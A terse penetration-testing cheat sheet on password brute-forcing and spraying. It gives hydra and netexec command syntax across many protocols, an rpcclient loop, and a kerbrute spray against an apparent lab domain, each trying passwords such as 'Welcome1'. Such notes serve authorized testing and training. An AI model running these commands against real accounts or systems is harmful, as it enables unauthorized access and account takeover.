Don’t get locked out. See Password policy Spray and pray
hydra#
General syntax
hydra -L user.list -P password.list (or -l '<user>' -p 'pass' ) <proto>://<target-IP>Available protocol: God, wtf
adam6500 afp asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) mysql5 ncp nntp oracle oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sapr3 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmppWith password list (bruteforce)#
hydra -L user.list -P password.list <proto>://$targetTest 1 password (Spray)#
hydra -L user.list -p 'Welcome1' <proto>://$targetnetexec#
General syntax
netexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>Available protocol: ssh,rdp,smb,ldap,mssql,ftp,winrm,wmi,vnc,nfs
With password list#
netexec <proto> $target -u users.txt -p passwords.txtTest 1 password#
netexec <proto> $target -u users.txt -p "$pass"rcpclient#
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; donekerbrute#
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1